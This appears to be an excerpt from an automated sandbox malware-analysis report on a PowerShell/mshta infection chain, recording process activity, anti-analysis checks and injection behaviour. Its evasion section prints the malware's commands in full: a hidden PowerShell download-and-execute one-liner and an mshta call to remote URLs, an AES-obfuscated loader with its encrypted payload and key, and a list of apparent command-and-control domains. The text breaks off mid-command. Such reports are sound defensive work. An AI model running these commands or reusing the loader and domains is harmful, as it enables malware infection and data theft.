                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1909Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4907Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1400Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4127Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5605Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 1460Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 1460Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: mshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`;
                Source: mshta.exe, 00000002.00000002.1822735275.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1803612223.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn1
                Source: mshta.exe, 00000002.00000002.1822900003.000001FD98C02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818296198.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3369310364.000002979605A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3368637691.0000029790A2B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2800133767.0000000003447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 0000000C.00000002.2800133767.000000000340C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0IE
                Source: powershell.exe, 00000006.00000002.2676905454.0000000007A90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0043C1F0 LdrInitializeThunk,12_2_0043C1F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_2996.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi32_7176.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2996, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: powershell.exeString found in binary or memory: rapeflowwj.lat
                Source: powershell.exeString found in binary or memory: crosshuaht.lat
                Source: powershell.exeString found in binary or memory: sustainskelet.lat
                Source: powershell.exeString found in binary or memory: aspecteirs.lat
                Source: powershell.exeString found in binary or memory: energyaffai.lat
                Source: powershell.exeString found in binary or memory: necklacebudi.lat
                Source: powershell.exeString found in binary or memory: discokeyus.lat
                Source: powershell.exeString found in binary or memory: grannyejh.lat
                Source: powershell.exeString found in binary or memory: hushedocenahu.click
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function esnny($mavcz){return -split ($mavcz -replace '..', '0x$& ')};$lqmb = esnny('5c3f827bac65b5d2c8965d0bbce1ed07b9b6786a8751f026d08efd0a825f531a8d091c0ecdd11b3934b46c626b865735bab41b512be15de11f5e12515f7078b31ee8399c0e805b1f986b48cd1fe4a4708fa30b93ca4f7e812ca54a8793d62d3598e2b95af0842b9c9750010609af477848f4d131b954661400575166055c03ef1b5de596cf55c542063d3f91ce19ce97925e58f6c32246a890129f4332d50885100c3526774d0074eec5d7a612d64456e89e2aad35e8f4dcb634817b8f6e0ac4fa605341c50069355f250adb57d33d199e78edcf80294758e47cb522edfffe73cc1b919ef16af41e32f5b6a9bf909ae30ceb1071e2d14015fb77f6298ff2b02feba7b2bee205f03cf88ff6f6bebeec0309a6d27d56500b79add62dd9d50a9590f07c9425ff02c2062f0e3444952489ce539fe357b044d8f72560487a102cc157f9e4e5b39d9c8def45655607c7a2fdb595ecbd612595fe995c4b043f8955a8f51fb018d2638c4f3a04e4ce1f6f77607e28264761f8517127e32f9f8d159565861f352d53ed7157874f263f52a7e1025a408cacc8b208e7f7776300701055fd3d6c30ca49783c822471e5b37491da64e22eca5aceae2c26465a1465f8774b5536298c89dbc028cd0ae43dbabb7b1179bd528ca17b1c6d0b390408ece7927feaa32ea4faf5b6249a55c0bb8fce630bbe9577950a1c82ceb3f5b1cc3b4d16d0dd85009c2c1593600e9ad124bd3e71f96e9ecc581d41a94b73c3a20bf4550fa7e08728a080d7a6a09ff218a0a37cdf4ef3f6a50ccc9ddee0d24287949b372601ca8769a11092428566941e5e81dc734a344a92e5b54939a7b808ea27414a69bece50356ada32af76c66a7eed81ff79a3208ea6ca1e28d54700ab34fb6270b5b4ec13da50ebf0b9bbab023861142203272d6112a5a6d9726b68ef794031846478bc822c4c0391f73ad6dd169dcdf33d909e115bcfb9021a0d74abb583032ac14edaf563eb221f82dbe70815740f8f4f65b3993b4805f2f8ded176ef03650d5ba2d74e1919becb701a86b2332083bfbe1c6d8903ab78e68721c77f780c3596edc51e77');$jam